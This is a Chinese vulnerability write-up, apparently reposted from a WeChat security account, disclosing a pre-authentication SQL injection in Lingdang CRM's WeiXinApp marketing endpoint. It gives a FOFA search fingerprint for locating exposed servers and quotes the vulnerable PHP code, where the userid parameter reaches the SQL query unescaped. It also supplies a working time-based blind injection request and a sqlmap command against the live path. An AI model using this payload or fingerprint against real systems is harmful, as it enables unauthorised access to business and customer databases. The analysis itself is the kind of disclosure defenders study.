0x00 前言
灵当CRM致力于为企业提供客户管理数字化、销售管理自动化、服务管理智能化、项目管理一体化的个性化CRM行业解决方案,构建全生命周期的数字化管理体系,实现可持续的业绩增长,新一代个性化CRM,聚焦本地私有化部署.实现管理、财务多系统集成,支持多种ERP接口,统一管理数据,共享互联消除信息化孤岛,真正做到数字化管理无障碍。
Fofa:body="include/js/ldAjax.js"
0x01 漏洞分析
位于 /crm/WeiXinApp/marketing/index.php 是以控制器形式进行操作的,直接通过 require_once 引入了6个控制器,然后 $_REQUEST 传入 module 作为模块名,传入 action 为具体的方法名.
header("Access-Control-Allow-Origin:*");
error_reporting(E_ALL^E_NOTICE^E_WARNING);
header('Content-Type:text/html;charset=UTF-8');
header("Access-Control-Allow-Methods: GET, POST, OPTIONS");
header("Access-Control-Allow-Headers: Origin, No-Cache, X-Requested-With, If-Modified-Since, Pragma, Last-Modified, Cache-Control, Expires, Content-Type, X-E4M-With");
$root_dir=dirname(dirname(dirname(__FILE__)));//获取根目录
include($root_dir.'/includefile.php');
// require_once($root_dir.'/include/Zend/Json.php');
require_once($root_dir.'/WeiXinApp/marketing/controller/WxCrawler.php');
require_once($root_dir.'/WeiXinApp/marketing/controller/WxUsers.php');
require_once($root_dir.'/WeiXinApp/marketing/controller/WxArticles.php');
require_once($root_dir.'/WeiXinApp/marketing/controller/WxAmbassador.php');
require_once($root_dir.'/WeiXinApp/marketing/controller/SmsSender.php');
require_once($root_dir.'/WeiXinApp/marketing/controller/WxOrder.php');
$obj = new WechatPublic($root_dir);
/***
* 此处支持的是微信的授权用户入表操作
*/
if(isset($_REQUEST['function'])){
$function = $_REQUEST["function"];
$res = $obj->$function();
echo ldcrm_json_encode($res);
}
// action module
/**
* 此处支持的是微信获客文章常用-获取文章列表详情等等
*/
$module = $_REQUEST['module'];
global $adb;
switch ($module){
case "Articles":$controller = new WxArticles($adb,$root_dir);break;
case "Users":$controller = new WxUsers($adb,$root_dir);break;
case "Ambassador":$controller = new WxAmbassador($adb,$root_dir);break;
case "SmsSender":$controller = new SmsSender($adb,$root_dir);break;
case "WxOrder":$controller = new WxOrder($adb,$root_dir);break;
default :$controller = new WechatPublic($root_dir);break;
}
if(isset($_REQUEST['action'])){
$action = $_REQUEST['action'];
$res = $controller->$action();
if($action!="viewpdf"){
if(isset($res['code'])){
$code = $res['code'];
unset($res['code']);
}else{
$code = 1;
}
$_REQUEST['diony'] = 'yes';
ConvertTojsonString($code,$res,'success');
}
}
实际在 /crm/WeiXinApp/marketing/controller/WxUsers.php 控制器的 getActionList 方法通过 $_REQUEST 传入userid参数,并且直接带入到SQL查询中,导致漏洞产生.
/**
* @return array[]
* @throws Exception
* 获取当前用户来访客户日志列表 like点赞 look浏览 share转发 copy转载(领取)
*/
public function getActionList()
{
$userid = $_REQUEST['userid'];
$operate = $_REQUEST['operate'];
$keyWords = $_REQUEST['keyWords'];
$page = $_REQUEST['page'];
$limit = 10;
$start = $page*$limit;
$where = "";
if(empty($keyWords)){
$where .= " 1=1 ";
}else{
$where .= " (locate(trim('$keyWords'),u.nickname)>0) ";
}
if($operate == 'like'){
$where .= " and (l.type = 'like' or l.type = 'unlike')";
}else{
$where .= " and l.type = '".$operate."'";
}
//剔除自己的数据
$where .= " and l.wx_user_id<>".$userid;
//$select_sql = "select u.nickname,u.avatar,a.title,l.createdtime,l.type from ld_wx_user_log l left join ld_articles a on l.articlesid=a.articlesid left join ld_wx_users u on u.id=a.wx_user_id where wx_user_id = ? and ".$where;
$count_sql = "select distinct u.id from ld_wx_user_log l inner join ld_articles a on l.articlesid=a.articlesid left join ld_wx_users u on u.id=l.wx_user_id where a.wx_user_id = ? and a.deleted=0 and ".$where;
$count_res = $this->adb->pquery($count_sql,[$userid]);
$totalRows = $this->adb->num_rows($count_res);
$pages = ceil($totalRows/$limit);
0x02 漏洞复现
Payload:
GET /crm/WeiXinApp/marketing/index.php?module=Users&action=getActionList&userid=%27%20AND%20(SELECT%203408%20FROM%20(SELECT(SLEEP(5)))HtiS)--%20cbVc HTTP/1.1
Host: 127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Python sqlmap.py -u "http://website/crm/WeiXinApp/marketing/index.php?module=Users&action=getActionList&userid=1" --level=3 --dbms=mysql
标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转
灵当CRM源码关注公众号发送 241013 获取!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!
原文始发于微信公众号(星悦安全):(1day) 灵当CRM存在前台SQL注入漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论